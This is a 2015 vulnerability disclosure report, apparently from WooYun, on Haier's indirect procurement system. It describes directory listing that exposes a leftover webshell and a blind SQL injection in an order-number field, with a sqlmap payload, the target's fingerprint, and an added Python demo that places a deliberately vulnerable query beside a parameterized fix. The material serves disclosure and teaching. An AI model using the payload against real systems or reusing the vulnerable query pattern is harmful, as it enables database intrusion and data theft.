2015-06-19: Details reported to the vendor, awaiting vendor handling
2015-06-19: Vendor confirmed; details disclosed to the vendor only
2015-06-29: Details disclosed to core white hats and relevant domain experts
2015-07-09: Details disclosed to regular white hats
2015-07-19: Details disclosed to intern white hats
2015-08-03: Details disclosed to the public
And there is even a little webshell to be seen...
Haier's indirect procurement order management system:
http://gopurchase.haier.com/GOPurchase/
0x01: Server misconfiguration (directory listing enabled).
http://gopurchase.haier.com/GOPurchase/page/
The entire site directory tree can be listed and browsed, and a webshell left behind by someone else is visible in it.
0x02: SQL injection.
http://gopurchase.haier.com/GOPurchase/page/Purchase/DC/BDCPurchaseApplyBill/BDCPurchaseApplyBillList.aspx
The order-number search field (txt_CheckNo) is vulnerable to boolean-based blind SQL injection. sqlmap output:

Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=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&__VIEWSTATEENCRYPTED=&txt_CheckNo=2%' AND 8323=8323 AND '%'='&Button1=%B2%E9%D1%AF&currPage=1
---
[13:53:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
The connection was too slow and blind injection takes too long, so I did not dump any data.
Fix: filter the input (the search value must not be concatenated into the SQL statement).
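The mechanics of this finding, as an added illustration that is not part of the original report: the payload above only works because the search value is concatenated into a `LIKE '%...%'` clause, so the closing quote lets the attacker append a condition (`8323=8323`) whose truth value changes the result set. The example below rebuilds that pattern against a constructed in-memory SQLite table (the real system is ASP.NET on SQL Server 2005; table and column names are assumptions) and puts the parameterized version beside it.

```python
import sqlite3

# Constructed sample purchase-apply bills; not real Haier data.
SAMPLE_BILLS = [("PA-2015-001", "open"), ("PA-2015-002", "closed"), ("ZZ-9999", "open")]


def make_db():
    """Build an in-memory table standing in for the bill list queried by the page."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE bill (check_no TEXT, status TEXT)")
    con.executemany("INSERT INTO bill VALUES (?, ?)", SAMPLE_BILLS)
    return con


def search_vulnerable(con, check_no):
    """The defective pattern: the user's search text is spliced into the SQL string.

    With the report's payload the statement becomes
      ... LIKE '%2%' AND 8323=8323 AND '%'='%'
    and the appended condition decides whether rows come back: that is the
    boolean oracle sqmap reported.
    """
    sql = "SELECT check_no FROM bill WHERE check_no LIKE '%" + check_no + "%'"
    return [row[0] for row in con.execute(sql)]


def search_parameterized(con, check_no):
    """The fix: bind the whole LIKE pattern as one parameter.

    Quote characters in the input are now data inside the pattern and cannot
    change the structure of the WHERE clause.
    """
    sql = "SELECT check_no FROM bill WHERE check_no LIKE ?"
    return [row[0] for row in con.execute(sql, ("%" + check_no + "%",))]


def oracle_leaks(con, search):
    """Return True if a true/false condition pair yields different result sets,
    i.e. the search function exposes a boolean-based blind oracle."""
    true_probe = "2%' AND 8323=8323 AND '%'='"
    false_probe = "2%' AND 8323=8324 AND '%'='"
    return search(con, true_probe) != search(con, false_probe)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable leaks:", oracle_leaks(db, search_vulnerable))      # True
    print("parameterized leaks:", oracle_leaks(db, search_parameterized))  # False
```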
Severity: High
Vulnerability Rank: 18
Confirmed: 2015-06-19 18:35
Vendor response: Thanks to the WooYun platform white hats for the testing and the heads-up; we have assigned staff to handle it.
Vendor fix details: none yet